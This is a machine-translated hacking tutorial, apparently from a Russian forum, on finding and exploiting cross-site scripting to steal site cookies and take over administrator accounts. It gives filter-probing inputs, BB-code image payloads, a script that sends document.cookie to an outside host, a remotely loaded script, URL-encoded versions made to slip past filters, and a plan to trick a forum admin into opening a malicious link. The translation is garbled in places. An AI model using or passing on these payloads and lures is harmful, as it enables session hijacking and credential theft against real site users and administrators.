This page has been robot translated, sorry for typos if any. Original content here.

Description Xss from A to Z.



  • Xss is Css => Cross Site Scripting
  • How to use XSS
  • What is XSS attack?
  • What are passive and active XSS?
  • So, let me turn specifically to how to find in this site XSS.
  • And how to determine if there is a filter or not?
  • Active XSS
  • We've been doing type codes all the time.
  • How to substitute it to the link with Xss?


  • Xss is Css => Cross Site Scripting

    Not to be confused with CSS also called XSS
    For the first time this BAG appeared in 1997.



    How to use XSS.


    First we need to know what a cookie is.
    If you know, you can skip it.

    Cookies are used to store site credentials on a visitor’s computer.
    If you have registered on the site under the name 'blabluble', then the site saved a cookie file on your computer where your data is encoded.
    And if you have an admin and you have access to the site, and I am the user who stole cookies from you (admin), then I can safely access the site, and the site defines me as 'admin' - I will have administrator rights.

    For changing (substitution of stolen) cookies, I advise you to use the CookieEdit program for IE or the built-in functions in Opera and Firefox.

    To intercept cookies, you need to find a place on the site where you can perform an XSS attack.


    What is XSS attack?


    XSS attacks are not attacks on the site itself, but on site users.
    XSS is a flaw in the filter application.

    There are passive XSS and active XSS.

    What are passive and active XSS?


    Passive ones are Xss, which require direct participation from the victim + there are specific limitations and difficulties.
    Therefore, passive XSS is not much appreciated.
    For example, you need to force her to follow a poisonous link, which will require social engineering, cunning.

    Active - these are XSS, which, do not require any additional actions on the part of the victim - she just needs to open the page with your XSS and the Java code will be executed automatically.
    Due to its automation, they are very useful and valuable.
    For example, active hss exist in BB tags due to insufficient filtering when you leave a message on the forum \ guest book \ chat, which will always be active with every update.




    So, let me turn specifically to how to find in this site XSS.


    As I wrote earlier that XSS consists of tags, they also consist of html, and javascript language =).

    Javascript can be entered in html.
    You can encode to bypass filters. But more about that later.

    How to learn that XSS on this site passes?
    The uzdavimosti type is awful
    <script> alert () </ script> We are trying to insert this script into all the different fields ... if the message came out, the script was processed and executed.

    The most common XSS (observed in all places where there is poor filtering):

    "> <script> alert () </ script>

    The whole point is "> .

    Let's think about what we do when we type in the "> <script> alert () </ script> field, what happens?

    We enter in the form "> <script> alert () </ script> some variable is assigned a field value. The variable is processed, "> executed, closes

    script and executes <script> alert () </ script>

    This XSS is the most common search engine:

    We look through all the fields of the site and try to insert "> <script> alert () </ script>
    If the message came out, you found the XSS ...




    And how to determine if there is a filter or not?


    Just enter in any field: '';! - "<########> = & & (()}
    Next, open the html page and look for the word "########"
    and see the subsequent syvoly ..

    If <> remained, then this is the first sign of vulnerability - then the filter has a hole.
    If , "'\ characters remained as they were entered - this is the second sign of vulnerability - possible additional characters to the subsequent XSS attack.
    Then, if you open the HTML, you did not find <> then most likely a hole in the filter.
    If you open the HTML you find that <> replaced by other characters, then this is a bummer - a filter at
    least functioning normally.
    It is also possible to enter in the field to check the filtering like this: "> <> '" `/ / \? @%

    Consider the case if the filter eats up <>

    In this case, there is a probability of a hole.
    For example, a filter has a condition to eat <script>, <> and.
    Then try the <zxcvb script: alert ();

    The filter looks nothing dangerous in <IMG% 20SRC = "java script: alert (); no, it closes and thus
    executing the script.

    Of course, if the filter does not filter various encodings, you can try to encode the script and insert the code.

    Everything should be tried by trial and error to look for ...
    Try to enter in the fields and carefully review what we got from the filter.
    By tykov method, understand how the filter works, whether it has flaws.
    If the filter is bad, we can always insert scripts.




    Active XSS


    Here it is necessary to use the allowed tags and being covered with them, you must execute the query.

    For example, tags url, bb, img.
    The whole point of insertion is that we need to embed a request into the parser img or url. Img has many parameters besides src and alt.
    This bug is very often used on the forum, in guestbooks ...

    Consider active XSS.

    Warnings !!!

    Tags [fon * t], [im * g], [ur * l] write with * so that they do not merge with the site code.
    To use these tags, delete * .

    For example, let's review the forum for the presence of using tags [fon * t], [im * g], [ur * l] and try to insert a script into them or combine them:

    [im * g] http: //www.qwewqw.ru/1.jpg [/ im * g] A cross comes out ... it means img is used and we picked it up (it's just that img is turned on, and admins from creating a message it is removed, they say it is impossible to insert pictures and it can be used
    different shapes) if there is no cross ... and the whole inscription hangs, then try again like this:
    [im * g src = https: //www.qwewqw.ru/1.jpg]

    Well, for example, we achieved a cross with this:
    [im * g] https://www.qweqw.ru/1.jpg [/ im * g]

    Check if the filter is holding a space, add a space after the extension jpg:
    [im * g] https://www.qweqw.ru/1.jpg [/ im * g]
    if there is a cross, then everything is OK.

    Next, img has dynsrc and lowsrc parameters that hold javascript. Trying to insert for example:
    [im * g] http://www.qwewqw.ru/1.jpg dynsrc = java script: alert () [/ im * g]
    check, send - a message appears - it means you have found the active XSS and instead of alert () you can insert any script.

    If the filter does not give up, try this:
    [im * g] http://www.qweqw.ru/ "/ dynsrc =" java script: alert () "/ 1.jpg [/ im * g]
    and
    [im * g] http://www.qwewqw.ru/ "/ dynsrc = java script: alert () / 1.jpg [/ im * g]

    If a cross came out of the above examples, then https: //www.qweqw.ru/1.jpg is replaced with the address of the sniffer.

    There are cases when jpg is disabled by the admin.




    We have been doing type codes all the time:


    <script>alert('HakNet')</script>
    java script:alert('HakNet')
    java script:alert('HakNet')/1.jpg и так далие..
    But they did not bring any benefit, they are just codes for testing (testing) on ​​Xss.

    Here is the script:
    <script>
    img = new Image();
    img.src = "http://antichat.org/s/HakNet.gif?"+document.cookie;
    </script>
    He is already stealing cookies =)




    How to substitute it to the link with Xss?


    Yes, very easy ...
    There are several options:

    - 1) do it like this:
    http://*****.ru/free?p='><script>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;</script> where the **** site with Xss.

    Here is the script itself:
    '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script>
    - 2) You can still do this:
    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script> where it refers to http: // haknet .h16.ru / script / js.js

    and in js.js there are:
    img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie; This method is more reliable.

    But as I already wrote, sometimes there are difficulties with filters on the site (it does not roll our script).
    Then you need to think about how to get around it.
    You can just add something, change something, or delete it in the script.
    But there is a more reliable option when we simply encode the script. For this there is a lot of prog.
    There is a site like http://ha.ckers.org/xss.html (encoder-decoder).

    Here is an example:
    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E
    It was coded:

    http://*****.ru/free?p='><script src=http://haknet.h16.ru/script/js.js></script>
    - 3) Especially encryption is necessary not only to deceive filters, but also to deceive ADMIN when using PASSIVE CSU.

    Here is an example based on social engineering.
    We are looking for contact with the administrator of the forum in the forum to throw him a link to your site, and say like this "cool feature is on the site" and so far in the same spirit.
    And on our website you will have guessed it =) here is the script:

    <script language="JavaScript">
    document.location.href="%68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E"
    </script>

    What does document.location.href do you ask me? )) .. this is a Java code that goes to the specified site without a request. So why do we do it, gave us a link to the admin, and he went to our site, that's what's being done .. he is quickly thrown at

    %68%74%74%70%3A%2F%2F%2A%2A%2A%2A%2A%2E%72%75%2F%6 6%72%65%65%3F%70%3D%27%3E%3C%73%63%72%69%70%74%20% 73%72%63%3D%68%74%74%70%3A%2F%2F%68%61%6B%6E%65%74 %2E%68%31%36%2E%72%75%2F%73%63%72%69%70%74%2F%6A%7 3%2E%6A%73%3E%3C%2F%73%63%72%69%70%74%3E and this is our Xss in encrypted form.

    Note: this will only work if Xss will belong to the admin of the site to which you dropped the link ...
    In other words, the DUTY of PASSIVE CSU is that vulnerability can be used ONLY if the victim is AUTHORIZED on a vulnerable site !!!